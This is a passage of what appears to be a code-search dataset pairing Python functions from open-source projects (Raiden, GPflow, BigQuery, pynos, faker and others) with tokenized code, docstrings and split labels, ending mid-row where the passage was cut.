def _check_values(self, values): """Check values whenever they come through the values setter.""" assert isinstance(values, Iterable) and not \ isinstance(values, (str, dict, bytes, bytearray)), \ 'values should be a list or tuple. Got {}'.format(type(values)) assert len(values) == len(self.datetimes), \ 'Length of values list must match length of datetimes list. {} != {}'.format( len(values), len(self.datetimes)) assert len(values) > 0, 'Data Collection must include at least one value'
[ "def", "_check_values", "(", "self", ",", "values", ")", ":", "assert", "isinstance", "(", "values", ",", "Iterable", ")", "and", "not", "isinstance", "(", "values", ",", "(", "str", ",", "dict", ",", "bytes", ",", "bytearray", ")", ")", ",", "'values should be a list or tuple. Got {}'", ".", "format", "(", "type", "(", "values", ")", ")", "assert", "len", "(", "values", ")", "==", "len", "(", "self", ".", "datetimes", ")", ",", "'Length of values list must match length of datetimes list. {} != {}'", ".", "format", "(", "len", "(", "values", ")", ",", "len", "(", "self", ".", "datetimes", ")", ")", "assert", "len", "(", "values", ")", ">", "0", ",", "'Data Collection must include at least one value'" ]
Check values whenever they come through the values setter.
[ "Check", "values", "whenever", "they", "come", "through", "the", "values", "setter", "." ]
python
train
BlueBrain/hpcbench
hpcbench/toolbox/process.py
https://github.com/BlueBrain/hpcbench/blob/192d0ec142b897157ec25f131d1ef28f84752592/hpcbench/toolbox/process.py#L57-L74
def physical_cpus(): """Get cpus identifiers, for instance set(["0", "1", "2", "3"]) :return Number of physical CPUs available :rtype: int """ if platform.system() == 'Darwin': ncores = subprocess.check_output( ['/usr/sbin/sysctl', '-n', 'hw.ncpu'], shell=False ) return int(ncores.strip()) sockets = set() with open('/proc/cpuinfo') as istr: for line in istr: if line.startswith('physical id'): sockets.add(line.split(':')[-1].strip()) return len(sockets)
[ "def", "physical_cpus", "(", ")", ":", "if", "platform", ".", "system", "(", ")", "==", "'Darwin'", ":", "ncores", "=", "subprocess", ".", "check_output", "(", "[", "'/usr/sbin/sysctl'", ",", "'-n'", ",", "'hw.ncpu'", "]", ",", "shell", "=", "False", ")", "return", "int", "(", "ncores", ".", "strip", "(", ")", ")", "sockets", "=", "set", "(", ")", "with", "open", "(", "'/proc/cpuinfo'", ")", "as", "istr", ":", "for", "line", "in", "istr", ":", "if", "line", ".", "startswith", "(", "'physical id'", ")", ":", "sockets", ".", "add", "(", "line", ".", "split", "(", "':'", ")", "[", "-", "1", "]", ".", "strip", "(", ")", ")", "return", "len", "(", "sockets", ")" ]
Get cpus identifiers, for instance set(["0", "1", "2", "3"]) :return Number of physical CPUs available :rtype: int
[ "Get", "cpus", "identifiers", "for", "instance", "set", "(", "[", "0", "1", "2", "3", "]", ")" ]
python
train
GPflow/GPflow
gpflow/core/node.py
https://github.com/GPflow/GPflow/blob/549394f0b1b0696c7b521a065e49bdae6e7acf27/gpflow/core/node.py#L86-L95
def clear(self): """ Calls `_clear` abstract method which must be implemented by descendants. :raises: GPflowError exception when parent of the node is built. """ parent = self.parent if parent is not self and parent.is_built_coherence(self.graph) is Build.YES: raise GPflowError('Clear method cannot be started. Upper nodes are built.') self._clear()
[ "def", "clear", "(", "self", ")", ":", "parent", "=", "self", ".", "parent", "if", "parent", "is", "not", "self", "and", "parent", ".", "is_built_coherence", "(", "self", ".", "graph", ")", "is", "Build", ".", "YES", ":", "raise", "GPflowError", "(", "'Clear method cannot be started. Upper nodes are built.'", ")", "self", ".", "_clear", "(", ")" ]
Calls `_clear` abstract method which must be implemented by descendants. :raises: GPflowError exception when parent of the node is built.
[ "Calls", "_clear", "abstract", "method", "which", "must", "be", "implemented", "by", "descendants", "." ]
python
train
ascribe/transactions
transactions/transactions.py
https://github.com/ascribe/transactions/blob/08f344ce1879152d2a0ba51dda76f11e73c83867/transactions/transactions.py#L68-L88
def get(self, hash, account="*", max_transactions=100, min_confirmations=6, raw=False): """ Args: hash: can be a bitcoin address or a transaction id. If it's a bitcoin address it will return a list of transactions up to ``max_transactions`` a list of unspents with confirmed transactions greater or equal to ``min_confirmantions`` account (Optional[str]): used when using the bitcoind. bitcoind does not provide an easy way to retrieve transactions for a single address. By using account we can retrieve transactions for addresses in a specific account Returns: transaction """ if len(hash) < 64: txs = self._service.list_transactions(hash, account=account, max_transactions=max_transactions) unspents = self._service.list_unspents(hash, min_confirmations=min_confirmations) return {'transactions': txs, 'unspents': unspents} else: return self._service.get_transaction(hash, raw=raw)
[ "def", "get", "(", "self", ",", "hash", ",", "account", "=", "\"*\"", ",", "max_transactions", "=", "100", ",", "min_confirmations", "=", "6", ",", "raw", "=", "False", ")", ":", "if", "len", "(", "hash", ")", "<", "64", ":", "txs", "=", "self", ".", "_service", ".", "list_transactions", "(", "hash", ",", "account", "=", "account", ",", "max_transactions", "=", "max_transactions", ")", "unspents", "=", "self", ".", "_service", ".", "list_unspents", "(", "hash", ",", "min_confirmations", "=", "min_confirmations", ")", "return", "{", "'transactions'", ":", "txs", ",", "'unspents'", ":", "unspents", "}", "else", ":", "return", "self", ".", "_service", ".", "get_transaction", "(", "hash", ",", "raw", "=", "raw", ")" ]
Args: hash: can be a bitcoin address or a transaction id. If it's a bitcoin address it will return a list of transactions up to ``max_transactions`` a list of unspents with confirmed transactions greater or equal to ``min_confirmantions`` account (Optional[str]): used when using the bitcoind. bitcoind does not provide an easy way to retrieve transactions for a single address. By using account we can retrieve transactions for addresses in a specific account Returns: transaction
[ "Args", ":", "hash", ":", "can", "be", "a", "bitcoin", "address", "or", "a", "transaction", "id", ".", "If", "it", "s", "a", "bitcoin", "address", "it", "will", "return", "a", "list", "of", "transactions", "up", "to", "max_transactions", "a", "list", "of", "unspents", "with", "confirmed", "transactions", "greater", "or", "equal", "to", "min_confirmantions", "account", "(", "Optional", "[", "str", "]", ")", ":", "used", "when", "using", "the", "bitcoind", ".", "bitcoind", "does", "not", "provide", "an", "easy", "way", "to", "retrieve", "transactions", "for", "a", "single", "address", ".", "By", "using", "account", "we", "can", "retrieve", "transactions", "for", "addresses", "in", "a", "specific", "account", "Returns", ":", "transaction" ]
python
train
raiden-network/raiden
raiden/connection_manager.py
https://github.com/raiden-network/raiden/blob/407ba15c72074e9de88771d6b9661ff4dc36bef5/raiden/connection_manager.py#L208-L286
def join_channel(self, partner_address, partner_deposit): """Will be called, when we were selected as channel partner by another node. It will fund the channel with up to the partners deposit, but not more than remaining funds or the initial funding per channel. If the connection manager has no funds, this is a noop. """ # Consider this race condition: # # - Partner opens the channel and starts the deposit. # - This nodes learns about the new channel, starts ConnectionManager's # retry_connect, which will start a deposit for this half of the # channel. # - This node learns about the partner's deposit before its own. # join_channel is called which will try to deposit again. # # To fix this race, first the node must wait for the pending operations # to finish, because in them could be a deposit, and then deposit must # be called only if the channel is still not funded. token_network_proxy = self.raiden.chain.token_network(self.token_network_identifier) # Wait for any pending operation in the channel to complete, before # deciding on the deposit with self.lock, token_network_proxy.channel_operations_lock[partner_address]: channel_state = views.get_channelstate_for( views.state_from_raiden(self.raiden), self.token_network_identifier, self.token_address, partner_address, ) if not channel_state: return joining_funds = min( partner_deposit, self._funds_remaining, self._initial_funding_per_partner, ) if joining_funds <= 0 or self._leaving_state: return if joining_funds <= channel_state.our_state.contract_balance: return try: self.api.set_total_channel_deposit( self.registry_address, self.token_address, partner_address, joining_funds, ) except RaidenRecoverableError: log.info( 'Channel not in opened state', node=pex(self.raiden.address), ) except InvalidDBData: raise except RaidenUnrecoverableError as e: should_crash = ( self.raiden.config['environment_type'] != Environment.PRODUCTION or self.raiden.config['unrecoverable_error_should_crash'] ) if should_crash: raise log.critical( str(e), node=pex(self.raiden.address), ) else: log.info( 'Joined a channel', node=pex(self.raiden.address), partner=pex(partner_address), funds=joining_funds, )
[ "def", "join_channel", "(", "self", ",", "partner_address", ",", "partner_deposit", ")", ":", "# Consider this race condition:", "#", "# - Partner opens the channel and starts the deposit.", "# - This nodes learns about the new channel, starts ConnectionManager's", "# retry_connect, which will start a deposit for this half of the", "# channel.", "# - This node learns about the partner's deposit before its own.", "# join_channel is called which will try to deposit again.", "#", "# To fix this race, first the node must wait for the pending operations", "# to finish, because in them could be a deposit, and then deposit must", "# be called only if the channel is still not funded.", "token_network_proxy", "=", "self", ".", "raiden", ".", "chain", ".", "token_network", "(", "self", ".", "token_network_identifier", ")", "# Wait for any pending operation in the channel to complete, before", "# deciding on the deposit", "with", "self", ".", "lock", ",", "token_network_proxy", ".", "channel_operations_lock", "[", "partner_address", "]", ":", "channel_state", "=", "views", ".", "get_channelstate_for", "(", "views", ".", "state_from_raiden", "(", "self", ".", "raiden", ")", ",", "self", ".", "token_network_identifier", ",", "self", ".", "token_address", ",", "partner_address", ",", ")", "if", "not", "channel_state", ":", "return", "joining_funds", "=", "min", "(", "partner_deposit", ",", "self", ".", "_funds_remaining", ",", "self", ".", "_initial_funding_per_partner", ",", ")", "if", "joining_funds", "<=", "0", "or", "self", ".", "_leaving_state", ":", "return", "if", "joining_funds", "<=", "channel_state", ".", "our_state", ".", "contract_balance", ":", "return", "try", ":", "self", ".", "api", ".", "set_total_channel_deposit", "(", "self", ".", "registry_address", ",", "self", ".", "token_address", ",", "partner_address", ",", "joining_funds", ",", ")", "except", "RaidenRecoverableError", ":", "log", ".", "info", "(", "'Channel not in opened state'", ",", "node", "=", "pex", "(", "self", ".", "raiden", ".", "address", ")", ",", ")", "except", "InvalidDBData", ":", "raise", "except", "RaidenUnrecoverableError", "as", "e", ":", "should_crash", "=", "(", "self", ".", "raiden", ".", "config", "[", "'environment_type'", "]", "!=", "Environment", ".", "PRODUCTION", "or", "self", ".", "raiden", ".", "config", "[", "'unrecoverable_error_should_crash'", "]", ")", "if", "should_crash", ":", "raise", "log", ".", "critical", "(", "str", "(", "e", ")", ",", "node", "=", "pex", "(", "self", ".", "raiden", ".", "address", ")", ",", ")", "else", ":", "log", ".", "info", "(", "'Joined a channel'", ",", "node", "=", "pex", "(", "self", ".", "raiden", ".", "address", ")", ",", "partner", "=", "pex", "(", "partner_address", ")", ",", "funds", "=", "joining_funds", ",", ")" ]
Will be called, when we were selected as channel partner by another node. It will fund the channel with up to the partners deposit, but not more than remaining funds or the initial funding per channel. If the connection manager has no funds, this is a noop.
[ "Will", "be", "called", "when", "we", "were", "selected", "as", "channel", "partner", "by", "another", "node", ".", "It", "will", "fund", "the", "channel", "with", "up", "to", "the", "partners", "deposit", "but", "not", "more", "than", "remaining", "funds", "or", "the", "initial", "funding", "per", "channel", "." ]
python
train
MisterY/asset-allocation
asset_allocation/cli.py
https://github.com/MisterY/asset-allocation/blob/72239aa20762cda67c091f27b86e65d61bf3b613/asset_allocation/cli.py#L30-L46
def show(format, full): """ Print current allocation to the console. """ # load asset allocation app = AppAggregate() app.logger = logger model = app.get_asset_allocation() if format == "ascii": formatter = AsciiFormatter() elif format == "html": formatter = HtmlFormatter else: raise ValueError(f"Unknown formatter {format}") # formatters can display stock information with --full output = formatter.format(model, full=full) print(output)
[ "def", "show", "(", "format", ",", "full", ")", ":", "# load asset allocation", "app", "=", "AppAggregate", "(", ")", "app", ".", "logger", "=", "logger", "model", "=", "app", ".", "get_asset_allocation", "(", ")", "if", "format", "==", "\"ascii\"", ":", "formatter", "=", "AsciiFormatter", "(", ")", "elif", "format", "==", "\"html\"", ":", "formatter", "=", "HtmlFormatter", "else", ":", "raise", "ValueError", "(", "f\"Unknown formatter {format}\"", ")", "# formatters can display stock information with --full", "output", "=", "formatter", ".", "format", "(", "model", ",", "full", "=", "full", ")", "print", "(", "output", ")" ]
Print current allocation to the console.
[ "Print", "current", "allocation", "to", "the", "console", "." ]
python
train
brocade/pynos
pynos/versions/ver_7/ver_7_0_0/bgp.py
https://github.com/brocade/pynos/blob/bd8a34e98f322de3fc06750827d8bbc3a0c00380/pynos/versions/ver_7/ver_7_0_0/bgp.py#L677-L731
def peer_bfd_timers(self, **kwargs): """Configure BFD for BGP globally. Args: rbridge_id (str): Rbridge to configure. (1, 225, etc) peer_ip (str): Peer IPv4 address for BFD setting. tx (str): BFD transmit interval in milliseconds (300, 500, etc) rx (str): BFD receive interval in milliseconds (300, 500, etc) multiplier (str): BFD multiplier. (3, 7, 5, etc) delete (bool): True if BFD configuration should be deleted. Default value will be False if not specified. get (bool): Get config instead of editing config. (True, False) callback (function): A function executed upon completion of the method. The only parameter passed to `callback` will be the ``ElementTree`` `config`. Returns: Return value of `callback`. Raises: KeyError: if `tx`, `rx`, or `multiplier` is not passed. Examples: >>> import pynos.device >>> switches = ['10.24.39.230'] >>> auth = ('admin', 'password') >>> for switch in switches: ... conn = (switch, '22') ... with pynos.device.Device(conn=conn, auth=auth) as dev: ... output = dev.bgp.neighbor(ip_addr='10.10.10.20', ... remote_as='65535', rbridge_id='230') ... output = dev.bgp.peer_bfd_timers(peer_ip='10.10.10.20', ... rx='300', tx='300', multiplier='3', rbridge_id='230') ... output = dev.bgp.peer_bfd_timers(peer_ip='10.10.10.20', ... rx='300', tx='300', multiplier='3', rbridge_id='230', ... get=True) ... output = dev.bgp.peer_bfd_timers(peer_ip='10.10.10.20', ... rx='300', tx='300', multiplier='3', ... rbridge_id='230', delete=True) ... output = dev.bgp.neighbor(ip_addr='10.10.10.20', ... delete=True, rbridge_id='230', remote_as='65535') """ kwargs['min_tx'] = kwargs.pop('tx') kwargs['min_rx'] = kwargs.pop('rx') kwargs['router_bgp_neighbor_address'] = kwargs.pop('peer_ip') kwargs['delete'] = kwargs.pop('delete', False) callback = kwargs.pop('callback', self._callback) bfd_tx = self._peer_bfd_tx(**kwargs) bfd_rx = self._peer_bfd_rx(**kwargs) bfd_multiplier = self._peer_bfd_multiplier(**kwargs) if kwargs.pop('get', False): return self._peer_get_bfd(bfd_tx, bfd_rx, bfd_multiplier) config = pynos.utilities.merge_xml(bfd_tx, bfd_rx) config = pynos.utilities.merge_xml(config, bfd_multiplier) return callback(config)
[ "def", "peer_bfd_timers", "(", "self", ",", "*", "*", "kwargs", ")", ":", "kwargs", "[", "'min_tx'", "]", "=", "kwargs", ".", "pop", "(", "'tx'", ")", "kwargs", "[", "'min_rx'", "]", "=", "kwargs", ".", "pop", "(", "'rx'", ")", "kwargs", "[", "'router_bgp_neighbor_address'", "]", "=", "kwargs", ".", "pop", "(", "'peer_ip'", ")", "kwargs", "[", "'delete'", "]", "=", "kwargs", ".", "pop", "(", "'delete'", ",", "False", ")", "callback", "=", "kwargs", ".", "pop", "(", "'callback'", ",", "self", ".", "_callback", ")", "bfd_tx", "=", "self", ".", "_peer_bfd_tx", "(", "*", "*", "kwargs", ")", "bfd_rx", "=", "self", ".", "_peer_bfd_rx", "(", "*", "*", "kwargs", ")", "bfd_multiplier", "=", "self", ".", "_peer_bfd_multiplier", "(", "*", "*", "kwargs", ")", "if", "kwargs", ".", "pop", "(", "'get'", ",", "False", ")", ":", "return", "self", ".", "_peer_get_bfd", "(", "bfd_tx", ",", "bfd_rx", ",", "bfd_multiplier", ")", "config", "=", "pynos", ".", "utilities", ".", "merge_xml", "(", "bfd_tx", ",", "bfd_rx", ")", "config", "=", "pynos", ".", "utilities", ".", "merge_xml", "(", "config", ",", "bfd_multiplier", ")", "return", "callback", "(", "config", ")" ]
Configure BFD for BGP globally. Args: rbridge_id (str): Rbridge to configure. (1, 225, etc) peer_ip (str): Peer IPv4 address for BFD setting. tx (str): BFD transmit interval in milliseconds (300, 500, etc) rx (str): BFD receive interval in milliseconds (300, 500, etc) multiplier (str): BFD multiplier. (3, 7, 5, etc) delete (bool): True if BFD configuration should be deleted. Default value will be False if not specified. get (bool): Get config instead of editing config. (True, False) callback (function): A function executed upon completion of the method. The only parameter passed to `callback` will be the ``ElementTree`` `config`. Returns: Return value of `callback`. Raises: KeyError: if `tx`, `rx`, or `multiplier` is not passed. Examples: >>> import pynos.device >>> switches = ['10.24.39.230'] >>> auth = ('admin', 'password') >>> for switch in switches: ... conn = (switch, '22') ... with pynos.device.Device(conn=conn, auth=auth) as dev: ... output = dev.bgp.neighbor(ip_addr='10.10.10.20', ... remote_as='65535', rbridge_id='230') ... output = dev.bgp.peer_bfd_timers(peer_ip='10.10.10.20', ... rx='300', tx='300', multiplier='3', rbridge_id='230') ... output = dev.bgp.peer_bfd_timers(peer_ip='10.10.10.20', ... rx='300', tx='300', multiplier='3', rbridge_id='230', ... get=True) ... output = dev.bgp.peer_bfd_timers(peer_ip='10.10.10.20', ... rx='300', tx='300', multiplier='3', ... rbridge_id='230', delete=True) ... output = dev.bgp.neighbor(ip_addr='10.10.10.20', ... delete=True, rbridge_id='230', remote_as='65535')
[ "Configure", "BFD", "for", "BGP", "globally", "." ]
python
train
pbrisk/businessdate
businessdate/businessdate.py
https://github.com/pbrisk/businessdate/blob/79a0c5a4e557cbacca82a430403b18413404a9bc/businessdate/businessdate.py#L616-L622
def adjust_follow(self, holidays_obj=None): """ adjusts to Business Day Convention "Following" (4.12(a) (i) 2006 ISDA Definitions). """ while not BusinessDate.is_business_day(self, holidays_obj): self = BusinessDate.add_days(self, 1) return self
[ "def", "adjust_follow", "(", "self", ",", "holidays_obj", "=", "None", ")", ":", "while", "not", "BusinessDate", ".", "is_business_day", "(", "self", ",", "holidays_obj", ")", ":", "self", "=", "BusinessDate", ".", "add_days", "(", "self", ",", "1", ")", "return", "self" ]
adjusts to Business Day Convention "Following" (4.12(a) (i) 2006 ISDA Definitions).
[ "adjusts", "to", "Business", "Day", "Convention", "Following", "(", "4", ".", "12", "(", "a", ")", "(", "i", ")", "2006", "ISDA", "Definitions", ")", "." ]
python
valid
mfcloud/python-zvm-sdk
zvmsdk/vmops.py
https://github.com/mfcloud/python-zvm-sdk/blob/de9994ceca764f5460ce51bd74237986341d8e3c/zvmsdk/vmops.py#L134-L138
def guest_reboot(self, userid): """Reboot a guest vm.""" LOG.info("Begin to reboot vm %s", userid) self._smtclient.guest_reboot(userid) LOG.info("Complete reboot vm %s", userid)
[ "def", "guest_reboot", "(", "self", ",", "userid", ")", ":", "LOG", ".", "info", "(", "\"Begin to reboot vm %s\"", ",", "userid", ")", "self", ".", "_smtclient", ".", "guest_reboot", "(", "userid", ")", "LOG", ".", "info", "(", "\"Complete reboot vm %s\"", ",", "userid", ")" ]
Reboot a guest vm.
[ "Reboot", "a", "guest", "vm", "." ]
python
train
sentinel-hub/sentinelhub-py
sentinelhub/constants.py
https://github.com/sentinel-hub/sentinelhub-py/blob/08a83b7f1e289187159a643336995d8369860fea/sentinelhub/constants.py#L242-L254
def _get_utm_name_value_pair(zone, direction=_Direction.NORTH): """ Get name and code for UTM coordinates :param zone: UTM zone number :type zone: int :param direction: Direction enum type :type direction: Enum, optional (default=NORTH) :return: Name and code of UTM coordinates :rtype: str, str """ name = 'UTM_{}{}'.format(zone, direction.value) epsg = _get_utm_code(zone, direction) return name, epsg
[ "def", "_get_utm_name_value_pair", "(", "zone", ",", "direction", "=", "_Direction", ".", "NORTH", ")", ":", "name", "=", "'UTM_{}{}'", ".", "format", "(", "zone", ",", "direction", ".", "value", ")", "epsg", "=", "_get_utm_code", "(", "zone", ",", "direction", ")", "return", "name", ",", "epsg" ]
Get name and code for UTM coordinates :param zone: UTM zone number :type zone: int :param direction: Direction enum type :type direction: Enum, optional (default=NORTH) :return: Name and code of UTM coordinates :rtype: str, str
[ "Get", "name", "and", "code", "for", "UTM", "coordinates" ]
python
train
kodexlab/reliure
reliure/offline.py
https://github.com/kodexlab/reliure/blob/0450c7a9254c5c003162738458bbe0c49e777ba5/reliure/offline.py#L11-L45
def run(pipeline, input_gen, options={}): """ Run a pipeline over a input generator >>> # if we have a simple component >>> from reliure.pipeline import Composable >>> @Composable ... def print_each(letters): ... for letter in letters: ... print(letter) ... yield letter >>> # that we want to run over a given input: >>> input = "abcde" >>> # we just have to do : >>> res = run(print_each, input) a b c d e it is also possible to run any reliure pipeline this way: >>> import string >>> pipeline = Composable(lambda letters: (l.upper() for l in letters)) | print_each >>> res = run(pipeline, input) A B C D E """ logger = logging.getLogger("reliure.run") t0 = time() res = [output for output in pipeline(input_gen, **options)] logger.info("Pipeline executed in %1.3f sec" % (time() - t0)) return res
[ "def", "run", "(", "pipeline", ",", "input_gen", ",", "options", "=", "{", "}", ")", ":", "logger", "=", "logging", ".", "getLogger", "(", "\"reliure.run\"", ")", "t0", "=", "time", "(", ")", "res", "=", "[", "output", "for", "output", "in", "pipeline", "(", "input_gen", ",", "*", "*", "options", ")", "]", "logger", ".", "info", "(", "\"Pipeline executed in %1.3f sec\"", "%", "(", "time", "(", ")", "-", "t0", ")", ")", "return", "res" ]
Run a pipeline over a input generator >>> # if we have a simple component >>> from reliure.pipeline import Composable >>> @Composable ... def print_each(letters): ... for letter in letters: ... print(letter) ... yield letter >>> # that we want to run over a given input: >>> input = "abcde" >>> # we just have to do : >>> res = run(print_each, input) a b c d e it is also possible to run any reliure pipeline this way: >>> import string >>> pipeline = Composable(lambda letters: (l.upper() for l in letters)) | print_each >>> res = run(pipeline, input) A B C D E
[ "Run", "a", "pipeline", "over", "a", "input", "generator" ]
python
train
openid/JWTConnect-Python-OidcService
src/oidcservice/client_auth.py
https://github.com/openid/JWTConnect-Python-OidcService/blob/759ab7adef30a7e3b9d75475e2971433b9613788/src/oidcservice/client_auth.py#L225-L260
def construct(self, request=None, service=None, http_args=None, **kwargs): """ Constructing the Authorization header. The value of the Authorization header is "Bearer <access_token>". :param request: Request class instance :param service: Service :param http_args: HTTP header arguments :param kwargs: extra keyword arguments :return: """ if service.service_name == 'refresh_token': _acc_token = find_token(request, 'refresh_token', service, **kwargs) else: _acc_token = find_token(request, 'access_token', service, **kwargs) if not _acc_token: raise KeyError('No access or refresh token available') # The authorization value starts with 'Bearer' when bearer tokens # are used _bearer = "Bearer {}".format(_acc_token) # Add 'Authorization' to the headers if http_args is None: http_args = {"headers": {}} http_args["headers"]["Authorization"] = _bearer else: try: http_args["headers"]["Authorization"] = _bearer except KeyError: http_args["headers"] = {"Authorization": _bearer} return http_args
[ "def", "construct", "(", "self", ",", "request", "=", "None", ",", "service", "=", "None", ",", "http_args", "=", "None", ",", "*", "*", "kwargs", ")", ":", "if", "service", ".", "service_name", "==", "'refresh_token'", ":", "_acc_token", "=", "find_token", "(", "request", ",", "'refresh_token'", ",", "service", ",", "*", "*", "kwargs", ")", "else", ":", "_acc_token", "=", "find_token", "(", "request", ",", "'access_token'", ",", "service", ",", "*", "*", "kwargs", ")", "if", "not", "_acc_token", ":", "raise", "KeyError", "(", "'No access or refresh token available'", ")", "# The authorization value starts with 'Bearer' when bearer tokens", "# are used", "_bearer", "=", "\"Bearer {}\"", ".", "format", "(", "_acc_token", ")", "# Add 'Authorization' to the headers", "if", "http_args", "is", "None", ":", "http_args", "=", "{", "\"headers\"", ":", "{", "}", "}", "http_args", "[", "\"headers\"", "]", "[", "\"Authorization\"", "]", "=", "_bearer", "else", ":", "try", ":", "http_args", "[", "\"headers\"", "]", "[", "\"Authorization\"", "]", "=", "_bearer", "except", "KeyError", ":", "http_args", "[", "\"headers\"", "]", "=", "{", "\"Authorization\"", ":", "_bearer", "}", "return", "http_args" ]
Constructing the Authorization header. The value of the Authorization header is "Bearer <access_token>". :param request: Request class instance :param service: Service :param http_args: HTTP header arguments :param kwargs: extra keyword arguments :return:
[ "Constructing", "the", "Authorization", "header", ".", "The", "value", "of", "the", "Authorization", "header", "is", "Bearer", "<access_token", ">", "." ]
python
train
zeromake/aiosqlite3
aiosqlite3/pool.py
https://github.com/zeromake/aiosqlite3/blob/1a74a062507e2df8f833a70885e69dca0ab3e7e7/aiosqlite3/pool.py#L194-L211
def sync_close(self): """ 同步关闭 """ if self._closed: return while self._free: conn = self._free.popleft() if not conn.closed: # pragma: no cover conn.sync_close() for conn in self._used: if not conn.closed: # pragma: no cover conn.sync_close() self._terminated.add(conn) self._used.clear() self._closed = True
[ "def", "sync_close", "(", "self", ")", ":", "if", "self", ".", "_closed", ":", "return", "while", "self", ".", "_free", ":", "conn", "=", "self", ".", "_free", ".", "popleft", "(", ")", "if", "not", "conn", ".", "closed", ":", "# pragma: no cover", "conn", ".", "sync_close", "(", ")", "for", "conn", "in", "self", ".", "_used", ":", "if", "not", "conn", ".", "closed", ":", "# pragma: no cover", "conn", ".", "sync_close", "(", ")", "self", ".", "_terminated", ".", "add", "(", "conn", ")", "self", ".", "_used", ".", "clear", "(", ")", "self", ".", "_closed", "=", "True" ]
同步关闭
[ "同步关闭" ]
python
train
kgori/treeCl
treeCl/distance_matrix.py
https://github.com/kgori/treeCl/blob/fed624b3db1c19cc07175ca04e3eda6905a8d305/treeCl/distance_matrix.py#L371-L384
def _embedding_nonmetric_mds(matrix, dimensions=3, initial_coords=None): """ Private method to calculate NMMDS embedding :param dimensions: (int) :return: coordinate matrix (np.array) """ mds = sklearn.manifold.MDS(n_components=dimensions, dissimilarity='precomputed', metric=False) if initial_coords is not None: mds.fit(matrix, init=initial_coords) else: mds.fit(matrix) return mds.embedding_
[ "def", "_embedding_nonmetric_mds", "(", "matrix", ",", "dimensions", "=", "3", ",", "initial_coords", "=", "None", ")", ":", "mds", "=", "sklearn", ".", "manifold", ".", "MDS", "(", "n_components", "=", "dimensions", ",", "dissimilarity", "=", "'precomputed'", ",", "metric", "=", "False", ")", "if", "initial_coords", "is", "not", "None", ":", "mds", ".", "fit", "(", "matrix", ",", "init", "=", "initial_coords", ")", "else", ":", "mds", ".", "fit", "(", "matrix", ")", "return", "mds", ".", "embedding_" ]
Private method to calculate NMMDS embedding :param dimensions: (int) :return: coordinate matrix (np.array)
[ "Private", "method", "to", "calculate", "NMMDS", "embedding", ":", "param", "dimensions", ":", "(", "int", ")", ":", "return", ":", "coordinate", "matrix", "(", "np", ".", "array", ")" ]
python
train
googleapis/google-cloud-python
bigquery/google/cloud/bigquery/query.py
https://github.com/googleapis/google-cloud-python/blob/85e80125a59cb10f8cb105f25ecc099e4b940b50/bigquery/google/cloud/bigquery/query.py#L256-L279
def to_api_repr(self): """Construct JSON API representation for the parameter. :rtype: dict :returns: JSON mapping """ values = self.values if self.array_type == "RECORD" or self.array_type == "STRUCT": reprs = [value.to_api_repr() for value in values] a_type = reprs[0]["parameterType"] a_values = [repr_["parameterValue"] for repr_ in reprs] else: a_type = {"type": self.array_type} converter = _SCALAR_VALUE_TO_JSON_PARAM.get(self.array_type) if converter is not None: values = [converter(value) for value in values] a_values = [{"value": value} for value in values] resource = { "parameterType": {"type": "ARRAY", "arrayType": a_type}, "parameterValue": {"arrayValues": a_values}, } if self.name is not None: resource["name"] = self.name return resource
[ "def", "to_api_repr", "(", "self", ")", ":", "values", "=", "self", ".", "values", "if", "self", ".", "array_type", "==", "\"RECORD\"", "or", "self", ".", "array_type", "==", "\"STRUCT\"", ":", "reprs", "=", "[", "value", ".", "to_api_repr", "(", ")", "for", "value", "in", "values", "]", "a_type", "=", "reprs", "[", "0", "]", "[", "\"parameterType\"", "]", "a_values", "=", "[", "repr_", "[", "\"parameterValue\"", "]", "for", "repr_", "in", "reprs", "]", "else", ":", "a_type", "=", "{", "\"type\"", ":", "self", ".", "array_type", "}", "converter", "=", "_SCALAR_VALUE_TO_JSON_PARAM", ".", "get", "(", "self", ".", "array_type", ")", "if", "converter", "is", "not", "None", ":", "values", "=", "[", "converter", "(", "value", ")", "for", "value", "in", "values", "]", "a_values", "=", "[", "{", "\"value\"", ":", "value", "}", "for", "value", "in", "values", "]", "resource", "=", "{", "\"parameterType\"", ":", "{", "\"type\"", ":", "\"ARRAY\"", ",", "\"arrayType\"", ":", "a_type", "}", ",", "\"parameterValue\"", ":", "{", "\"arrayValues\"", ":", "a_values", "}", ",", "}", "if", "self", ".", "name", "is", "not", "None", ":", "resource", "[", "\"name\"", "]", "=", "self", ".", "name", "return", "resource" ]
Construct JSON API representation for the parameter. :rtype: dict :returns: JSON mapping
[ "Construct", "JSON", "API", "representation", "for", "the", "parameter", "." ]
python
train
trevisanj/a99
a99/gui/_logpart.py
https://github.com/trevisanj/a99/blob/193e6e3c9b3e4f4a0ba7eb3eece846fe7045c539/a99/gui/_logpart.py#L24-L38
def add_log_error(self, x, flag_also_show=False, E=None): """Sets text of labelError.""" if len(x) == 0: x = "(empty error)" tb.print_stack() x_ = x if E is not None: a99.get_python_logger().exception(x_) else: a99.get_python_logger().info("ERROR: {}".format(x_)) x = '<span style="color: {0!s}">{1!s}</span>'.format(a99.COLOR_ERROR, x) self._add_log_no_logger(x, False) if flag_also_show: a99.show_error(x_)
[ "def", "add_log_error", "(", "self", ",", "x", ",", "flag_also_show", "=", "False", ",", "E", "=", "None", ")", ":", "if", "len", "(", "x", ")", "==", "0", ":", "x", "=", "\"(empty error)\"", "tb", ".", "print_stack", "(", ")", "x_", "=", "x", "if", "E", "is", "not", "None", ":", "a99", ".", "get_python_logger", "(", ")", ".", "exception", "(", "x_", ")", "else", ":", "a99", ".", "get_python_logger", "(", ")", ".", "info", "(", "\"ERROR: {}\"", ".", "format", "(", "x_", ")", ")", "x", "=", "'<span style=\"color: {0!s}\">{1!s}</span>'", ".", "format", "(", "a99", ".", "COLOR_ERROR", ",", "x", ")", "self", ".", "_add_log_no_logger", "(", "x", ",", "False", ")", "if", "flag_also_show", ":", "a99", ".", "show_error", "(", "x_", ")" ]
Sets text of labelError.
[ "Sets", "text", "of", "labelError", "." ]
python
train
joke2k/faker
faker/providers/isbn/isbn.py
https://github.com/joke2k/faker/blob/965824b61132e52d92d1a6ce470396dbbe01c96c/faker/providers/isbn/isbn.py#L25-L36
def _check_digit(self): """ Calculate the check digit for ISBN-13. See https://en.wikipedia.org/wiki/International_Standard_Book_Number for calculation. """ weights = (1 if x % 2 == 0 else 3 for x in range(12)) body = ''.join([self.ean, self.group, self.registrant, self.publication]) remainder = sum(int(b) * w for b, w in zip(body, weights)) % 10 diff = 10 - remainder check_digit = 0 if diff == 10 else diff return str(check_digit)
